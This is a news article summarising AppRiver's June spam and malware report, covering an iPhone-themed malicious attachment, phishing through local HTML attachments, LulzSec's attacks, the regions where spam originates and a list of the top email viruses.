The advertisement has links to a malicious web page that hosts a file named iphone5.gif.exe. The file infects the users' PCs and creates a backdoor to the machine, the report found.
“The spam went out right before Apple’s World Wide Developers Conference, so it could snag a few people”, Fred Touchette, senior security analyst with AppRiver, told Infosecurity. The conference was held June 6-10 in San Francisco.
The report also found an increase in html spam, virus, and phishing attacks using attachments. The attachments are uses to trick recipients into believing they are on a legitimate webpage, in order to veil the hackers true intentions.
“In this method, spammers send an attachment. Once it is opened, some people might be tricked into thinking they are visiting an actual webpage; in actuality, it is local to their machine. Once they fill out the phishing form and hit submit, [the information is sent] off to a website [where the hackers] are storing the information. That way, they can keep that site up and operational longer”, Touchette explained.
Another noteworthy occurrence in June was the rash of attacks by LulzSec against many governmental and corporate targets. “They were attack public facing web servers and databases, and the real damage they did…was releasing users passwords and all this personal information; it was really unnecessary”, Touchette said. “Overall, I think it was a publicity grab”, he added.
In terms of spam origination, Russia held onto the top spot for the third month in a row, according to the monthly spam report. South Korea jumped two spots to take third place, with India in second place.
By region, Asia was the top source of spam, making up 40.3% of spam origination worldwide. Europe was second, with 26.2% of the world total, and North American was third, with 16.2%.
According to the AppRiver report, the top 10 email-delivered viruses were: X.W32.Sasfis.pak, X.UPX.App.pakuber, W32\Mydoom.O, X.W32.Buzus.pak, W32\Mydoom.R_worm, X.W32.Netsky.Q, W32\Merond.O_worm, W32\Mydoom.N, W32\Netsky.C, and X.UPX.App.pakuberb. The virus names that begin with “X.” signify rules that were written by AppRiver analysts.
Spam activity started off slow, but spiked in the second week of June, when the AppRiver filters began to catch millions of pieces per day. “Though it is normal for virus traffic patterns to rise and fall with associated botnet activity, this wave seems to be remaining strong”, the report noted.
In addition, there was an increase in the use of the McDonald’s brand in spam. In June, emails began circulating claiming to be coupons for free food at the fast food chain, but the emails contained malware, not free food coupons, the report noted.